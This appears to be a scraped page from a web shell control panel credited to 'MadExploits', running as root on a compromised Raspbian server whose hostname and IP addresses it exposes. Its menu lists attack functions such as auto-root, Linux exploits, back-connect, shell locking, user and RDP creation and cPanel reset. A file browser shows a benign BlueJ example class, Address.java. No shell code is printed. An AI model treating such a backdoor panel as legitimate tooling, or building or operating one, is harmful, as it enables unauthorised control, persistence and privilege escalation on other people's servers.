Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
BlueJ /
people2 /
[ HOME SHELL ]
Name
Size
Permission
Action
Address.java
949
B
-rw-r--r--
Database.java
885
B
-rw-r--r--
Person.java
1.57
KB
-rw-r--r--
README.TXT
481
B
-rw-r--r--
Staff.java
1.11
KB
-rw-r--r--
Student.java
1009
B
-rw-r--r--
package.bluej
981
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Address.java
/** * Class Address - used to store address details for a post address * * @author Michael Kölling * @version 1.0, January 1999 */ public class Address { private String street; private String town; private String postCode; private String country; /** * Construct an Address without country */ public Address(String street, String town, String postCode) { this(street, town, postCode, ""); } /** * Construct an Address with full details */ public Address(String street, String town, String postCode, String country) { this.street = street; this.town = town; this.postCode = postCode; this.country = country; } /** * Return a string representation of this object. */ public String toString() { return street + "\n" + town + " " + postCode + "\n" + country + "\n"; } }
Close